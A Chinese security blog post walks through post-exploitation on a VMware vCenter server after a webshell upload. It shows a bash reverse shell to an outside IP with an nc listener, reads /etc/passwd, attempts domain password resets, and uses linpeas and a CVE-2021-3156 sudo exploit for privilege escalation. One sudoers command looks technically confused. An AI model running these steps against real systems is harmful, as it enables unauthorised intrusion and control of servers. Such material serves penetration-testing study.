【护网必问】Vcenter后渗透漏洞应用!

【护网必问】Vcenter后渗透漏洞应用!

进击的HACK 2024-05-06 21:51

点击蓝字,立即关注

前言:通过未授权前台上传shell成功拿到webshell,这几天面试题问的多,就先尝试一下Vcenter后渗透

漏洞版本->6.71

https://10.128.23.123/sdk/vimServiceVersions.xml

VMware vCenter Server 7.0系列< 7.0.U1c


VMware vCenter Server 6.7系列< 6.7.U3l


VMware vCenter Server 6.5系列< 6.5 U3n

研判容器

cat /proc/1/cgroup

通常需要检查/proc/1/cgroup文件中的内容。在容器中,通常会有类似于$1:name=systemd:/docker/$container_id的行,其中$container_id是容器的唯一标识符。

这里我们判断是非容器了且执行权限不是root,权限一般般

su
chmod +x /etc/sudoers

提权

cat /etc/*-release

VMware Photon…..第一次听这个操作系统,以为是容器但是前面判断并没有什么container-id,于是去问gpt

用了一个提权脚本,以失败告终

https://github.com/worawit/CVE-2021-3156/blob/main/exploit_defaults_mailer.py

看看有哪些管理员账户吧

cat /etc/passwd

可以发现uid0的只有root账户

遍历域账户

/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost

重置域账户密码,失败了,很好,还是权限的问题。

/usr/lib/vmware-vmdir/bin/vdcadmintool


[email protected]

先反弹到我主机上来

nc -lvvp 1555


bash -i >& /dev/tcp/10.23.108.79/1555 0>&1

linpeas提权

直接在我windows上启动msf,正向shell试试看。

uname -a

lscpu

确定是虚拟机搭建

./linpeas.sh

这里列举了一堆可以进行提权的历史漏洞

进一步证明为vmware

sudo -V

sudo版本是1.8.20p2,存在sudo提权漏洞CVE-2021-3156

sudoedit -s /

上传相关提权脚本后编译,直接告诉我无make指令,下载又需要sudo权限泪目了,后续通过上传编译脚本直接拿下

END

往期回顾

【独家揭秘】某EDU!Docker容器逃逸大揭秘!你的数据安全有多脆弱?

【大招来袭】超强浏览器插件,助你绕过微信授权登录限制!

过火绒、腾讯管家、defender免杀思路分享

点分享

点收藏

点在看

点点赞